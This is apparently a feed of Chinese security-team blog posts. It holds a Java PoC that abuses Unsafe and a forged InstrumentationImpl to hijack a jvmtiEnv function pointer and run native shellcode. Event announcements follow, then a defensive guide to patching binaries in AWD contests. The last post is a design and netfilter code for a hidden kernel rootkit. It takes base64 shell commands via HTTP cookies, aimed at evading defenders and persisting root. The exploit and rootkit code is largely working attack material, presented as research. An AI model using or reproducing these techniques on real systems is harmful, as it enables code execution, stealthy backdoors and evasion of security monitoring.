    private static void doAgent(long address) throws Exception {        Class cls = Class.forName("sun.instrument.InstrumentationImpl");        for (int i = 0; i < cls.getDeclaredConstructors().length; i++) {            Constructor constructor = cls.getDeclaredConstructors()[i];            constructor.setAccessible(true);            Object obj = constructor.newInstance(address, true, true);            for (Field f : cls.getDeclaredFields()) {                f.setAccessible(true);                if (f.getName().equals("mEnvironmentSupportsRedefineClasses")) {                    //System.out.println("mEnvironmentSupportsRedefineClasses:" + f.get(obj));                }            }            for (Method m : cls.getMethods()) {
                if (m.getName().equals("redefineClasses")) {                    //System.out.println("redefineClasses:" + m);                    String newBirdClassStr = "yv66vgAAADIAHwoABgARCQASABMIABQKABUAFgcAFwcAGAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQATTG5ldC9yZWJleW9uZC9CaXJkOwEACHNheUhlbGxvAQAKU291cmNlRmlsZQEACUJpcmQuamF2YQwABwAIBwAZDAAaABsBAAhjaGFuZ2VkIQcAHAwAHQAeAQARbmV0L3JlYmV5b25kL0JpcmQBABBqYXZhL2xhbmcvT2JqZWN0AQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAACAAEABwAIAAEACQAAAC8AAQABAAAABSq3AAGxAAAAAgAKAAAABgABAAAAAwALAAAADAABAAAABQAMAA0AAAABAA4ACAABAAkAAAA3AAIAAQAAAAmyAAISA7YABLEAAAACAAoAAAAKAAIAAAAGAAgABwALAAAADAABAAAACQAMAA0AAAABAA8AAAACABA=";                    Bird bird = new Bird();                    ClassDefinition classDefinition = new ClassDefinition(                            bird.getClass(),                            Base64.getDecoder().decode(newBirdClassStr));                    ClassDefinition[] classDefinitions = new ClassDefinition[]{classDefinition};                    try {                        //Thread.sleep(5000);                        m.invoke(obj, new Object[]{classDefinitions});                    } catch (Exception e) {                        e.printStackTrace();                    }
                }            }            //System.out.println("instrument obj:" + obj);            //System.out.println("constr:" + cls.getDeclaredConstructors()[i]);        }    }
    private static Unsafe getUnsafe() {        Unsafe unsafe = null;
        try {            Field field = Unsafe.class.getDeclaredField("theUnsafe");            field.setAccessible(true);            unsafe = (Unsafe) field.get(null);        } catch (Exception e) {            throw new AssertionError(e);        }        return unsafe;    }
}
Bird.java
package net.rebeyond;
public class Bird {    public void sayHello()    {        System.out.println("hello!");    }}
编译，运行： 
上述环境是win10+Jdk1.8.0_301_x64，注释中内置了linux+jdk1.8.0_301_x64和win10+Jdk1.8.0_271_x64指纹，如果是其他OS或者JDK版本，指纹库需要对应更新。
可以看到，我们成功通过纯Java代码实现了动态修改类字节码。
按照惯例，我提出一种新的技术理论的时候，一般会直接给出一个下载即可用的exp，但是现在为了合规起见，此处只给出demo，不再提供完整的利用工具。
Java跨平台任意Native代码执行
确定入口
上文中，我们介绍了在Windows平台下巧妙利用instrument的不恰当实现来进行进程注入的技术，当注入的目标进行为-1时，可以往当前Java进程注入shellcode，实现不依赖JNI执行任意Native代码。但是这个方法仅适用于Windows平台。只适用于Windows平台的技术是不完整的：）
上一小节我们在伪造JPLISAgent对象的时候，留意到redefineClasses函数里面有这种代码：

allocate函数的第一个参数是jvmtienv指针，我们跟进allocate函数：
void *allocate(jvmtiEnv * jvmtienv, size_t bytecount) {    void *          resultBuffer    = NULL;    jvmtiError      error           = JVMTI_ERROR_NONE;
    error = (*jvmtienv)->Allocate(jvmtienv,                                bytecount,                                (unsigned char**) &resultBuffer);    /* may be called from any phase */    jplis_assert(error == JVMTI_ERROR_NONE);    if ( error != JVMTI_ERROR_NONE ) {        resultBuffer = NULL;    }    return resultBuffer;}
可以看到最终是调用的jvmtienv对象的一个成员函数，先看一下真实的jvmtienv是什么样子： 
对象里是很多函数指针，看到这里，如果你经常分析二进制漏洞的话，可能会马上想到这里jvmtienv是我们完全可控的，我们只要在伪造的jvmtienv对象指定的偏移位置覆盖这个函数指针即可实现任意代码执行。
构造如下POC：
先动态调试看一下我们布局的payload：
0x219d1b1a810为我们通过unsafe.allocateMemory分配内存的首地址，我们从这里开始布局JPLISAgent对象，0x219d1b1a818处的值0x219d1b1a820是指向jvmtienv的指针，跟进0x219d1b1a820，其值为指向真实的jvmtienv对象的指针，这里我们把他指向了他自己0x219d1b1a820，接下来我们就可以在0x219d1b1a820处布置最终的jvmtienv对象了。根据动态调试得知allocate函数指针在jvmtienv对象的偏移量为0x168，我们只要覆盖0x219d1b1a820+0x168（0x219d1b1a988）的值为我们shellcode的地址即可将RIP引入shellcode。此处我们把0x219d1b1a988处的值设置为0x219d1b1a990，紧跟在0x219d1b1a988的后面，然后往0x219d1b1a990写入shellcode。
编译，运行：
进程crash了，报的异常是意料之中，仔细看下报的异常：
#EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x00000219d1b1a990, pid=24840, tid=0x0000000000005bfc
内存访问异常，但是pc的值是0x00000219d1b1a990，这就是我们shellcode的首地址。说明我们的payload布置是正确的，只不过系统开启了NX（DEP），导致我们没办法去执行shellcode，下图是异常的现场，可见RIP已经到了shellcode：
绕过NX(DEP)
上文的POC中我们已经可以劫持RIP,但是我们的shellcode部署在堆上，不方便通过ROP关闭DEP。那能不能找一块rwx的内存呢？熟悉浏览器漏洞挖掘的朋友都知道JIT区域天生RWE，而Java也是有JIT特性的，通过分析进程内存布局，可以看到Java进程确实也存在这样一个区域，如下图：
我们只要通过unsafe把shellcode写入这个区域即可。但是，还有ASLR，需要绕过ASLR才能获取到这块JIT区域。
绕过ASLR
在前面我们已经提到了一种通过匹配指针指纹绕过ASLR的方法，这个方法在这里同样适用。不过，这里我想换一种方法，因为通过指纹匹配的方式，需要针对不同的Java版本做适配，还是比较麻烦的。这里采用了搜索内存的方法，如下：
package net.rebeyond;


import sun.misc.Unsafe;
import java.lang.instrument.ClassDefinition;import java.lang.reflect.Constructor;import java.lang.reflect.Field;import java.lang.reflect.Method;import java.util.HashMap;import java.util.Map;
public class PocForRCE {    public static void main(String [] args) throws Throwable {
        byte buf[] = new byte[]                {                        (byte) 0x41, (byte) 0x48, (byte) 0x83, (byte) 0xe4, (byte) 0xf0, (byte) 0xe8, (byte) 0xc0, (byte) 0x00,                        (byte) 0x00, (byte) 0x00, (byte) 0x41, (byte) 0x51, (byte) 0x41, (byte) 0x50, (byte) 0x52, (byte) 0x51,                        (byte) 0x56, (byte) 0x48, (byte) 0x31, (byte) 0xd2, (byte) 0x65, (byte) 0x48, (byte) 0x8b, (byte) 0x52,                        (byte) 0x60, (byte) 0x48, (byte) 0x8b, (byte) 0x52, (byte) 0x18, (byte) 0x48, (byte) 0x8b, (byte) 0x52,                        (byte) 0x20, (byte) 0x48, (byte) 0x8b, (byte) 0x72, (byte) 0x50, (byte) 0x48, (byte) 0x0f, (byte) 0xb7,                        (byte) 0x4a, (byte) 0x4a, (byte) 0x4d, (byte) 0x31, (byte) 0xc9, (byte) 0x48, (byte) 0x31, (byte) 0xc0,                        (byte) 0xac, (byte) 0x3c, (byte) 0x61, (byte) 0x7c, (byte) 0x02, (byte) 0x2c, (byte) 0x20, (byte) 0x41,                        (byte) 0xc1, (byte) 0xc9, (byte) 0x0d, (byte) 0x41, (byte) 0x01, (byte) 0xc1, (byte) 0xe2, (byte) 0xed,                        (byte) 0x52, (byte) 0x41, (byte) 0x51, (byte) 0x48, (byte) 0x8b, (byte) 0x52, (byte) 0x20, (byte) 0x8b,                        (byte) 0x42, (byte) 0x3c, (byte) 0x48, (byte) 0x01, (byte) 0xd0, (byte) 0x8b, (byte) 0x80, (byte) 0x88,                        (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x48, (byte) 0x85, (byte) 0xc0, (byte) 0x74, (byte) 0x67,                        (byte) 0x48, (byte) 0x01, (byte) 0xd0, (byte) 0x50, (byte) 0x8b, (byte) 0x48, (byte) 0x18, (byte) 0x44,                        (byte) 0x8b, (byte) 0x40, (byte) 0x20, (byte) 0x49, (byte) 0x01, (byte) 0xd0, (byte) 0xe3, (byte) 0x56,                        (byte) 0x48, (byte) 0xff, (byte) 0xc9, (byte) 0x41, (byte) 0x8b, (byte) 0x34, (byte) 0x88, (byte) 0x48,                        (byte) 0x01, (byte) 0xd6, (byte) 0x4d, (byte) 0x31, (byte) 0xc9, (byte) 0x48, (byte) 0x31, (byte) 0xc0,                        (byte) 0xac, (byte) 0x41, (byte) 0xc1, (byte) 0xc9, (byte) 0x0d, (byte) 0x41, (byte) 0x01, (byte) 0xc1,                        (byte) 0x38, (byte) 0xe0, (byte) 0x75, (byte) 0xf1, (byte) 0x4c, (byte) 0x03, (byte) 0x4c, (byte) 0x24,                        (byte) 0x08, (byte) 0x45, (byte) 0x39, (byte) 0xd1, (byte) 0x75, (byte) 0xd8, (byte) 0x58, (byte) 0x44,                        (byte) 0x8b, (byte) 0x40, (byte) 0x24, (byte) 0x49, (byte) 0x01, (byte) 0xd0, (byte) 0x66, (byte) 0x41,                        (byte) 0x8b, (byte) 0x0c, (byte) 0x48, (byte) 0x44, (byte) 0x8b, (byte) 0x40, (byte) 0x1c, (byte) 0x49,                        (byte) 0x01, (byte) 0xd0, (byte) 0x41, (byte) 0x8b, (byte) 0x04, (byte) 0x88, (byte) 0x48, (byte) 0x01,                        (byte) 0xd0, (byte) 0x41, (byte) 0x58, (byte) 0x41, (byte) 0x58, (byte) 0x5e, (byte) 0x59, (byte) 0x5a,                        (byte) 0x41, (byte) 0x58, (byte) 0x41, (byte) 0x59, (byte) 0x41, (byte) 0x5a, (byte) 0x48, (byte) 0x83,                        (byte) 0xec, (byte) 0x20, (byte) 0x41, (byte) 0x52, (byte) 0xff, (byte) 0xe0, (byte) 0x58, (byte) 0x41,                        (byte) 0x59, (byte) 0x5a, (byte) 0x48, (byte) 0x8b, (byte) 0x12, (byte) 0xe9, (byte) 0x57, (byte) 0xff,                        (byte) 0xff, (byte) 0xff, (byte) 0x5d, (byte) 0x48, (byte) 0xba, (byte) 0x01, (byte) 0x00, (byte) 0x00,                        (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x48, (byte) 0x8d, (byte) 0x8d,                        (byte) 0x01, (byte) 0x01, (byte) 0x00, (byte) 0x00, (byte) 0x41, (byte) 0xba, (byte) 0x31, (byte) 0x8b,                        (byte) 0x6f, (byte) 0x87, (byte) 0xff, (byte) 0xd5, (byte) 0xbb, (byte) 0xf0, (byte) 0xb5, (byte) 0xa2,                        (byte) 0x56, (byte) 0x41, (byte) 0xba, (byte) 0xa6, (byte) 0x95, (byte) 0xbd, (byte) 0x9d, (byte) 0xff,                        (byte) 0xd5, (byte) 0x48, (byte) 0x83, (byte) 0xc4, (byte) 0x28, (byte) 0x3c, (byte) 0x06, (byte) 0x7c,                        (byte) 0x0a, (byte) 0x80, (byte) 0xfb, (byte) 0xe0, (byte) 0x75, (byte) 0x05, (byte) 0xbb, (byte) 0x47,                        (byte) 0x13, (byte) 0x72, (byte) 0x6f, (byte) 0x6a, (byte) 0x00, (byte) 0x59, (byte) 0x41, (byte) 0x89,                        (byte) 0xda, (byte) 0xff, (byte) 0xd5, (byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e,                        (byte) 0x65, (byte) 0x78, (byte) 0x65, (byte) 0x00                };
        Unsafe unsafe = null;
        try {            Field field = sun.misc.Unsafe.class.getDeclaredField("theUnsafe");            field.setAccessible(true);            unsafe = (sun.misc.Unsafe) field.get(null);        } catch (Exception e) {            throw new AssertionError(e);        }

        long size = buf.length+0x178; // a long is 64 bits (http://docs.oracle.com/javase/tutorial/java/nutsandbolts/datatypes.html)        long allocateMemory = unsafe.allocateMemory(size);        System.out.println("allocateMemory:"+Long.toHexString(allocateMemory));
        Map map=new HashMap();        map.put("X","y");        //unsafe.putObject(map,allocateMemory+0x10,ints);        //unsafe.putByte(allocateMemory,);        PocForRCE poc=new PocForRCE();        for (int i=0;i<10000;i++)        {            poc.b(33);        }        Thread.sleep(2000);        for (int k=0;k<10000;k++)        {            long tmp=unsafe.allocateMemory(0x4000);            //unsafe.putLong(tmp+0x3900,tmp);            //System.out.println("alloce:"+Long.toHexString(tmp));        }
        long shellcodeBed = 0;        int offset=4;        for (int j=-0x1000;j<0x1000;j++)  //down search        {
            long target=unsafe.getAddress(allocateMemory+j*offset);            System.out.println("start get "+Long.toHexString(allocateMemory+j*offset)+",adress:"+Long.toHexString(target)+",now j is :"+j);            if (target%8>0)            {                continue;            }            if (target>(allocateMemory&0xffffffff00000000l)&&target<(allocateMemory|0xffffffl))            {
                if ((target&0xffffffffff000000l)==(allocateMemory&0xffffffffff000000l))                {                    continue;                }                if (Long.toHexString(target).indexOf("000000")>0||Long.toHexString(target).endsWith("bebeb0")||Long.toHexString(target).endsWith("abebeb"))                {                    System.out.println("maybe error address,skip "+Long.toHexString(target));                    continue;                }                System.out.println("BYTE:"+unsafe.getByte(target));                //System.out.println("get address:"+Long.toHexString(target)+",at :"+Long.toHexString(allocateMemory-j));                if (unsafe.getByte(target)==0X55||unsafe.getByte(target)==0XE8||unsafe.getByte(target)==(byte)0xA0||unsafe.getByte(target)==0x48||unsafe.getByte(target)==(byte)0x66)                {                    System.out.println("get address:"+Long.toHexString(target)+",at :"+Long.toHexString(allocateMemory-j*offset)+",BYTE:"+Long.toHexString(unsafe.getByte(target)));                    shellcodeBed=target;                    break;                }

            }
        }
        if (shellcodeBed==0)        {            for (int j=-0x100;j<0x800;j++)  //down search            {
                long target=unsafe.getAddress(allocateMemory+j*offset);                System.out.println("start get "+Long.toHexString(allocateMemory+j*offset)+",adress:"+Long.toHexString(target)+",now j is :"+j);                if (target%8>0)                {                    continue;                }                if (target>(allocateMemory&0xffffffff00000000l)&&target<(allocateMemory|0xffffffffl))                {
                    if ((target&0xffffffffff000000l)==(allocateMemory&0xffffffffff000000l))                    {                        continue;                    }                    if (Long.toHexString(target).indexOf("0000000")>0||Long.toHexString(target).endsWith("bebeb0")||Long.toHexString(target).endsWith("abebeb"))                    {                        System.out.println("maybe error address,skip "+Long.toHexString(target));                        continue;                    }                    System.out.println("BYTE:"+unsafe.getByte(target));                    //System.out.println("get address:"+Long.toHexString(target)+",at :"+Long.toHexString(allocateMemory-j));                    if (unsafe.getByte(target)==0X55||unsafe.getByte(target)==0XE8||unsafe.getByte(target)==(byte)0xA0||unsafe.getByte(target)==0x48)                    {                        System.out.println("get bigger cache address:"+Long.toHexString(target)+",at :"+Long.toHexString(allocateMemory-j*offset)+",BYTE:"+Long.toHexString(unsafe.getByte(target)));                        shellcodeBed=target;                        break;                    }
                }
            }        }        System.out.println("find address end,address is "+Long.toHexString(shellcodeBed)+" mod 8 is:"+shellcodeBed%8);

        String address="";
        allocateMemory=shellcodeBed;        address=allocateMemory+"";        Class cls=Class.forName("sun.instrument.InstrumentationImpl");
        Constructor constructor=cls.getDeclaredConstructors()[0];        constructor.setAccessible(true);        Object obj=constructor.newInstance(Long.parseLong(address),true,true);        Method redefineMethod=cls.getMethod("redefineClasses",new Class[]{ClassDefinition[].class});        ClassDefinition classDefinition=new ClassDefinition(                Class.class,                new byte[]{});        ClassDefinition[] classDefinitions=new ClassDefinition[]{classDefinition};        try        {            unsafe.putLong(allocateMemory+8,allocateMemory+0x10);  //set **jvmtienv point to it's next memory region            unsafe.putLong(allocateMemory+8+8,allocateMemory+0x10); //set *jvmtienv point to itself            unsafe.putLong(allocateMemory+0x10+0x168,allocateMemory+0x10+0x168+8); //overwrite allocate function pointer  to allocateMemory+0x10+0x168+8            for (int k=0;k            {                unsafe.putByte(allocateMemory+0x10+0x168+8+k,buf[k]); //write shellcode to allocate function body            }            redefineMethod.invoke(obj,new Object[]{classDefinitions});  //trigger allocate        }        catch (Exception e)        {            e.printStackTrace();        }
    }    private int a(int x)    {        if (x>1)        {            // System.out.println("x>1");        }        else        {            // System.out.println("x<=1");        }        return x*1;    }    private void b(int x)    {        if (a(x)>1)        {            //System.out.println("x>1");            this.a(x);        }        else        {            this.a(x+4);            // System.out.println("x<=1");        }    }}
编译，运行，成功执行了shellcode，弹出计算器。
到此，我们通过纯Java代码实现了跨平台的任意Native代码执行，从而可以解锁很多新玩法，比如绕过RASP实现命令执行、文件读写、数据库连接等等。
小结
本文主要介绍了几种我最近研究的内存相关的攻击方法，欢迎大家交流探讨，文中使用的测试环境为Win10_x64、Ubuntu16.04_x64、Java 1.8.0_301_x64、Java 1.8.0_271_x64。由于文章拖得比较久了，所以行文略有仓促，若有纰漏之处，欢迎批评指正。





阅读原文
跳转微信打开



银针安全沙龙上海站议程新鲜出炉
Mon, 05 Jul 2021 17:20:00 +0800

小仙女 2021-07-05 17:20 


银针安全沙龙上海站议程新鲜出炉，本周六下午2点华为上海研究所见！














阅读原文
跳转微信打开



【文末福利】银针安全沙龙上海站嘉宾招募，这个盛夏与你在上海不期而遇~
Mon, 28 Jun 2021 17:51:00 +0800

小仙女 2021-06-28 17:51 


银针安全沙龙上海站开启报名！转发赢银针安全沙龙定制T恤~









这个盛夏，一年一度的银针安全沙龙将走进上海，开启一场“渗透技术与攻防实战”主题的技术盛宴。上海的技术大神们，欢迎光临~！
——专注技术，只做精品沙龙——
银针安全沙龙是由银针安全团队发起的邀请制闭门沙龙。
拒绝排排坐听讲课，银针安全沙龙每期只邀请30位一线安全研究员围桌而坐，同业界大咖和银针安全实验室成员共同研讨当下最新的攻防实战课题，来一场纯技术的头脑风暴！
7月10日，银针安全沙龙上海站将在华为上海研究所举办，本次活动邀请到华为银针安全实验室、华为奇点安全实验室、腾讯安全、长亭科技等技术大佬到场，议题聚焦当下最热门的业务和技术，围绕渗透技术和实战攻防开展一场闭门研讨！
本次上海站活动将延续以往的邀请制原则，由嘉宾自主报名提供个人简介，严格筛选奋战在一线的安全研究员，欢迎各位大神报名参与~感兴趣的小伙伴请添加沙龙工作人员微信：13505187907，备注银针安全沙龙上海站报名，我们将在了解您的基本情况后给出报名结果。
PS：如果您想在沙龙现场分享您最新的研究成果和技术，也欢迎您带着议题联系我们，我们欢迎技术爱好者的声音！
转发本文章到朋友圈并截图反馈至公众号后台，我们将在7月7日随机抽取两名幸运伙伴，送出银针安全沙龙定制T恤一件~（经银针大佬邱老师亲测，穿起来超级舒服哦~！）
上海的小伙伴puts your hands up，我们的手机已准备好震个不停啦~！





阅读原文
跳转微信打开



AWD中二进制补丁的常见手工打法
Sat, 26 Jun 2021 11:00:00 +0800

原创 rec0rd 2021-06-26 11:00 


银针









背景介绍
近年来CTF攻防赛（AWD）趋向于攻防对等，即主办方会想办法让漏洞的修复变难，以此来增强比赛的趣味性（想象一下，如果漏洞修复很简单，大家上来一阵修复、通防，谁还能得分呢）。有时候，打补丁是如此的重要，以至于只要能打好补丁，就可以获取很好的成绩了。
让漏洞修复变难的办法很多，例如复杂的代码逻辑让漏洞发现时间变长、逐渐加强的checker等。复杂代码逻辑的作用是有限的，因为如果搞的太复杂，以至于在比赛时间内没人能写好exp，那题目就没有效果了。所以，变态的checker才是常用的解决方案。
为了对抗通防，目前的checker在静态阶段基本上都会进行hexdiff，例如要求打补丁之后的ELF和原始ELF相差不能超过100字节、补丁不能修改某些关键的寄存器等等。动态阶段的测试用例也会比较严格。因而，稳定可靠的二进制补丁还是要靠手工，以便于精准控制过checker。

基础知识
提前了解以下几个基础知识，对打补丁很有帮助
易失、非易失寄存器
Register 状态 含义
RAX 易失的 返回值寄存器
RCX 易失的 第一个整型参数
RDX 易失的 第二个整型参数
R8 易失的 第三个整型参数
R9 易失的 第四个整型参数
R10:R11 易失的 必须根据需要由调用方保留；在 syscall/sysret 指令中使用
R12:R15 非易失的 必须由被调用方保留
RDI 非易失的 必须由被调用方保留
RSI 非易失的 必须由被调用方保留
RBX 非易失的 必须由被调用方保留
RBP 非易失的 可用作帧指针；必须由被调用方保留
RSP 非易失的 堆栈指针
XMM0 易失的 第一个 FP 参数
XMM1 易失的 第二个 FP 参数
XMM2 易失的 第三个 FP 参数
XMM3 易失的 第四个 FP 参数
XMM4:XMM5 易失的 必须根据需要由调用方保留
XMM6:XMM15 非易失的 必须根据需要由被调用方保留
打补丁时要注意，如果需要使用寄存器的话，尽量使用易失寄存器，因为非易失寄存器可能在函数上层有汇编依赖于其值不变。
关键指令理解
call xxx : push rip; jmp xxx;
leave: mov rsp,rbp; pop rbp;
ret: pop rip; jmp rip;
补丁中常用汇编指令
[比较]
cmp xx
 ja jb ：无符号判断
jg jl  ：有符号判断
jz jnz  / je jne
 jp jnp ：偶判断
[移位]
SHL(Shift Left):  逻辑左移
SHR(Shift Right):  逻辑右移
SAL(Shift Arithmetic Left):  算术左移
SAR(Shift Arithmetic Right): 算术右移
[条件指令]
cmov[a/b/g/l/ae/be/ge/le] xxx, xxx
[strlen]
 (to find the length of the string whose starting address is in EDI：)
sub  ecx, ecxsub  al, alnot  ecxcldrepne  scasbnot  ecxdec  ecx
ecx值即为strlen的值。
eh_frame
当我们需要插入汇编代码时，往往会使用到这个空闲段，跳进去执行插入代码再跳回来。
替换、插入
有时候我们仅仅需要修改、替换指令，多余的位置nop即可，有时候复杂的patch逻辑就需要插入代码来实现；这两种模式我们称为替换模式和插入模式。
keypatch
IDA超好用的patch插件，我们只需要在里面写汇编，跳转偏移（机器码）之类的计算该插件会自动帮我们完成。

几种常见patch的打法
1. printf格式化串漏洞
x64补丁写法：
printf前插入（加入%s参数）
push 0x00007325mov rsi, rdilea rdi, [rsp]
printf后插入(栈平衡)
add rsp, 8
x86补丁写法：
762处替换为：
sub esp, 8
769处插入：
pop ecx;push 0x00007325;push ecx;lea eax, [esp+4];push eax;
注：如果plt中有puts，可以尝试用puts来修复，不过强checker下可能会校验不通过。
2. snprintf格式化串漏洞
b60处插入：
mov ecx, 0x00007325;mov [esp+0x10], ecx;lea ecx, [esp+0x10];mov [esp+0xc], eax;mov [esp+0x8], ecx;
3. off by null
f11处插入：
mov rcx, [rbp-0x20];sub rcx, 1;cmp rdx, rcx;cmova rdx, rcx;
修复后效果：
4. 栈溢出通用patch：添加栈cookie
有时候溢出代码异常复杂，只能试出offset和溢出缓冲区（利用FORWORD-2020 blacklist），这时候只能使用通用的patch方法，放大栈不一定彻底，加cookie更彻底，且可以当作通用栈溢出patch使用。
db8处替换为：
sub rsp, 0x48;
dbc处替换为:
lea rax, [rbp - 0x48];
dc0处插入:
mov rcx, 0x4a584e424a584e00;//cookie值可自定义mov [rbp - 0x8],  rcx;
dcd处插入：
mov rcx, 0x4a584e424a584e00;cmp rcx, [rbp - 0x8];jz 0x401dd2;mov rdi, 1;mov rax, 60;syscall;
5. gets溢出
nop掉gets调用，下方插入read系统调用实现读取。
6. double free
在1处插入指针非空的判断：
cmp rax, 0;jz 0x400b9e;
在2处插入指针置空逻辑:
mov eax, [rbp-4];cdqe;shl rax, 4;mov rdx, rax;lea rax, [0x6020e0];mov dword ptr [rdx+rax], 0;
7. 堆溢出通用patch：索引堆头size字段
（houseoforange）
上述位置插入以下代码：
lea rax, [0x203068];mov rax, [rax];mov rax, [rax+8];sub rax, 8;mov rcx, [rax];sub rcx, 0x8;cmp [rbp-0x18], rcx;jbe 0x10fe;mov [rbp-0x18], rcx;
patch效果：





阅读原文
跳转微信打开



一种HTTP隧道内核态远控的实现方法
Mon, 21 Jun 2021 17:43:00 +0800

原创 游望之 2021-06-21 17:43 











序言
当前护网蓝军主动防御工具越来越强，其他隧道如DNS、ICMP等因特征明显都有比较有效的检测防范方法，HTTP隧道因为是正常业务通道、数据比较难甄别而成为隐藏流量的首选，内存马已经成为常规武器。
 在获得ROOT权限后，干掉主动防御软件可能不会那么容易，因为它可能并不是孤立而是分布式的、彼此间有联系，粗暴的直接停掉或杀掉防御进程会导致其他主机告警。因此，在此场景下想要持久化ROOT权限，内核远控的存在是有必要的。
设计思想
内核ROOKIT常用LKMD方式实现，多数主动防御工具都不具备内核模块的检测能力，而模块为防止被lsmod查看到，可使用“断链法”隐藏。HTTP服务是基于TCP协议的，我们可以使用某种特定的HTTP请求激活下发命令，然后执行结果会在该请求的响应中带出。比如设计如下交互，先看请求：
GET / HTTP/1.1Host: 192.168.122.136Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1cookie: 91d1c532-b156-11eb-8e2c-dfb994043297;ZWNobyAxID4gL3RtcC8xMjM0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.51Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Connection: close
将HTTP头中的cookie前面的UUID作为关键字，后跟远控命令的base64编码。内核远控在接收含有此关键字的TCP报文后（有效载荷大于0，即非SYN、SYN-ACK、ACK等握手应答包），解析并执行远控命令并在该HTTP响应（同样是TCP报文）的HTTP头中插入响应数据:
EagleEye-TraceId: hello rootkit
技术细节
Netfilter是Linux内核中的一个框架，它提供一个标准的接口，通过该接口能够方便的进行不同的网络操作，包括包过滤、网络地址转换和端口转换。Netfilter在内核中提供一组钩子hooks，通过这些hooks，内核模块可以向TCP/IP协议栈注册回调函数。我们可以基于netfilter实现上文所述的逻辑功能:
static struct nf_hook_ops _prehook, _posthook;
static unsigned int watch_in(unsigned int hooknum,           struct sk_buff *skb,           const struct net_device *in,           const struct net_device *out,           int (*okfn)(struct sk_buff *));
static unsigned int watch_out(unsigned int hooknum,            struct sk_buff *skb,            const struct net_device *in,            const struct net_device *out,            int (*okfn)(struct sk_buff *));
int init_module(){    /* Fill in our hook structure */    _prehook.hook =  (nf_hookfn *)watch_in;         /* Handler function */    _prehook.hooknum  = NF_INET_PRE_ROUTING; /* First hook for IPv4 */    _prehook.pf       = PF_INET;    _prehook.priority = NF_IP_PRI_FIRST;   /* Make our function first */
    _posthook.hook =   (nf_hookfn *)watch_out;      /* Handler function */    _posthook.hooknum  = NF_INET_POST_ROUTING; /* First hook for IPv4 */    _posthook.pf       = PF_INET;    _posthook.priority = NF_IP_PRI_FIRST;   /* Make our function first */
#if LINUX_VERSION_CODE >= KERNEL_VERSION(4,13,0)  nf_register_net_hook(&init_net, &_prehook);  nf_register_net_hook(&init_net, &_posthook);#else  nf_register_hook(&_prehook);  nf_register_hook(&_posthook);#endif    return 0;}
void cleanup_module(){#if LINUX_VERSION_CODE >= KERNEL_VERSION(4,13,0)  nf_unregister_net_hook(&init_net, &_prehook);  nf_unregister_net_hook(&init_net, &_posthook);#else  nf_unregister_hook(&_posthook);  nf_unregister_hook(&_prehook);#endif}
上述代码逻辑清楚很容易理解，在模块装载时在网络层注册勾子，卸载时解除勾子，watch_in处理输入报文，相应的watch_out处理输出报文。
static unsigned int watch_in(unsigned int hooknum,           struct sk_buff *skb,           const struct net_device *in,           const struct net_device *out,           int (*okfn)(struct sk_buff *)){    struct iphdr *ip_hdr = 0;    if(!skb)    return NF_ACCEPT; 
    ip_hdr = (struct iphdr *)skb_network_header(skb);  if(!ip_hdr)      return NF_ACCEPT;        if(ip_hdr->protocol != IPPROTO_TCP)        return NF_ACCEPT;
    struct tcphdr *tcph = tcp_hdr(skb);    if(skb->len == ip_hdr->ihl*4 + tcph->doff*4)//TCP握手包        return NF_ACCEPT;
    //访问tcp payload的数据时，要线性化，否则数据不全    if (0 != skb_linearize(skb))     {        return NF_ACCEPT;    }        tcph = tcp_hdr(skb);    char * data = (char *)(tcph) + tcph->doff * sizeof(int);    char cookie[1024] = {0};    if(getCookie(data, iptot_len - tcph->doff * sizeof(int), cookie, sizeof(cookie) - 1) == 0)        return NF_ACCEPT;
    if(strncmp(cookie, KEYWORD, sizeof(KEYWORD) - 1) != 0)        return NF_ACCEPT;    ...}
解析TCP载荷的过程中，要剥掉IP头和TCP头，注意skb一定要先线性化，否则报文内存是不连续的，不能按照指针加偏移量的方式访问。
 如何查找HTTP请求对应的HTTP响应报文？TCP链路，可以通过源端口和目的端口这个二元组一一对应。在watch_in中记下该HTTP请求的端口信息，再在watch_out中进行匹配查找，找到后注入自定义内容。
static unsigned int watch_out(unsigned int hooknum,            struct sk_buff *skb,            const struct net_device *in,            const struct net_device *out,            int (*okfn)(struct sk_buff *)){    struct iphdr *ip_hdr = 0;    if(!skb)    return NF_ACCEPT; 
    ip_hdr = (struct iphdr *)skb_network_header(skb);  if(!ip_hdr)      return NF_ACCEPT;        if(ip_hdr->protocol != IPPROTO_TCP)        return NF_ACCEPT;
    struct tcphdr *tcph = tcp_hdr(skb);    if(!tcph->psh)        return NF_ACCEPT;        unsigned short src_port = ntohs(tcph->source);    unsigned short dst_port = ntohs(tcph->dest);
    struct list_head * pos, * pos1;    struct C2Frame * frame = NULL;    int found = 0;    spin_lock(&_lock);    list_for_each_safe(pos, pos1, &_c2_list_head)    {        frame = list_entry(pos, struct C2Frame, list);        if(frame->src_port == dst_port && frame->dst_port == src_port)        {            list_del((struct list_head *)pos);            found = 1;            break;        }    }    spin_unlock(&_lock);    if(found == 0)        return NF_ACCEPT;
    //printk("Found frame to inject!!!");    if (0 != skb_linearize(skb))     {        goto exit;    }
    unsigned short inject_len = frame->rsp_len;    inject_http_response(skb, frame->response, inject_len);    ...}
经实验，修改TCP报文的操作会有一些耗时，大概几百毫秒。
总结
本文提供一种内核远控的实现思路，至于在内核态能用来做什么可根据需求实现，如果想要回显（即修改HTTP响应、TCP回包）就不能执行IO等耗时操作。
